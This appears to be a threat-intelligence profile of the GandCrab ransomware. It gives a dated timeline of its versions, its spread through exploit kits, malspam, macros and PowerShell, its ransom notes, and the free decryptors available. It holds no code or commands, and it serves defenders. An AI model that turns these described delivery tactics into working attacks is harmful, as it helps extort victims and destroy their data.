GandCrab is currently distributed through a Seamless malvertising campaign that attempts to install the ransomware via the RIG exploit kit and GrandSoft exploit kit. This ransomware variant appends .GDCB to the names of encrypted files and skips files whose path contains any of the following: \ProgramData\, \Program Files\, \Tor Browser\, Ransomware, \All Users\, \Local Settings\, desktop.ini, autorun.inf, ntuser.dat, iconcache.db, bootsect.bak, boot.ini, ntuser.dat.log, thumbs.db, GDCB-DECRYPT.txt, .sql. GandCrab employs several NameCoin .BIT domains for its Command and Control (C2) servers.
GandCrab is the first documented ransomware to accept payments in the form of DASH cryptocurrency. A ransom note named GDCB-DECRYPT.txt is placed in multiple locations on the infected machine and demands a payment of 1.54 DASH ($1,170 USD). Victims are instructed to download the TOR browser or visit one of several provided TOR browser gateways for additional payment instructions.
2/8/2018: A malspam campaign is distributing GandCrab via malicious email attachments disguised as receipts. The infection chain begins when a user clicks on the Captcha field for the PDF document which initiates the download of a word document. If macros are enabled to run, GandCrab is downloaded and installed on the victim’s machine via PowerShell.
2/28/2018: The malware distribution campaign, EITest, is now distributing GandCrab as part of the HoeflerText Font Update scam. This campaign scrambles text of compromised websites and displays an alert advising the user to download an update to fix the issue. If the user clicks “Update” a file named Font_Update.exe will download and launch GandCrab ransomware on the victim’s machine.
3/6/2018: MalwareHunterTeam detected GandCrab version 2 which utilizes two new hostnames for the Command and Control servers, appends .CRAB to the names of encrypted files, and creates a ransom note named CRAB-Decrypt.txt. Additional changes include the ability to contact the malware developers via the Tox instant messaging service and an updated TOR payment page.
5/4/2018: Researchers with Fortinet discovered a new version, GandCrab v3, which uses Visual Basic Scripts to download the malware and changes the desktop wallpaper to a ransom note. Once files on an infected machine are encrypted, the malware forces a system reboot; however, a coding bug in the ransomware disrupts the reboot process and prevents the Windows Shell from completely loading on machines running Windows 7. As a result, victims with infected Windows 7 machines will only have access to the ransom note wallpaper and a site to download the TOR Browser. The reboot process is successful on affected Windows 10 and Windows 8.1 systems.
7/3/2018: GandCrab V4 appends .KRAB to the names of encrypted files, creates a ransom note named KRAB-DECRYPT.txt, uses the Salsa20 encryption algorithm, and directs victims to a new TOR payment site. This version of GandCrab is believed to be distributed via fraudulent software crack downloads. Currently, there is no free decryption tool available for GandCrab V4.
8/20/2018: Trend Micro detected an email spam campaign attempting to deliver to GandCrab v4.3 to users in South Korea. The emails reference an “e-commerce transaction” and abuse EGG (.egg) files, a compressed archive file format widely used throughout South Korea.
9/25/2018: GandCrab V5 appends a random five character extension to encrypted files and creates both a text and HTML ransom note. According to security researcher nao_sec, the newest version of GandCrab is distributed via malvertising campaigns that redirect users to websites hosting the Fallout exploit kit.
2/12/2019: A malicious spreadsheet builds a PowerShell command from individual pixels in a downloaded image of Mario from Super Mario Bros that, when executed, downloads and installs Gandcrab.
2/21/2019: A new version of GandCrab, 5.2, has been released.
3/7/2019: The threat actors behind GandCrab are attempting to compromise larger targets for bigger profits by compromising entire corporate networks via remote access.
Bleeping Computer provides additional information on GandCrab here.
Malwarebytes Labs provides additional analysis here.
Bitdefender released a free decryption tool for GandCrab via the NoMoreRansom project here. Bitdefender also released an additional free decryption tool for GandCrab versions 1, 4, and 5 available here.
Bitdefender released an additional free decryption tool for GandCrab that works against versions 5.0.4-5.1, which have been active since November 2018, available here.
3/21/2019: The threat actors are using fear tactics and a sense of urgency to entice the target to open the attached “important” information, enable content, and edit to view the document’s contents. Then a malicious Macro is executed to download the GandCrab installer.
Phishing emails contain the subject line “Flu pandemic warning,” and are impersonating a Centers for Disease Control (CDC) employee.
Fake DHL shipping notices were also identified using the same tactics.
4/23/2019: Threat actors are executing GandCrab via PowerShell and using standard toolsets to avoid detection.
5/7/2019: GandCrab has new evasive infection chain, starting with phishing emails and Office documents, multi-stage fileless infection chain to drop the ransomware, and leveraging binaries to bypass Windows AppLocker and fetch the ransomware payload from a legitimate online text sharing service.
6/1/2019: The creators of GandCrab are shutting down their Ransomware-as-a-Service (RaaS) operation within the month. There are plans to delete all decryption keys, making file recovery for infected victims impossible.
Image Source: Bleeping Computer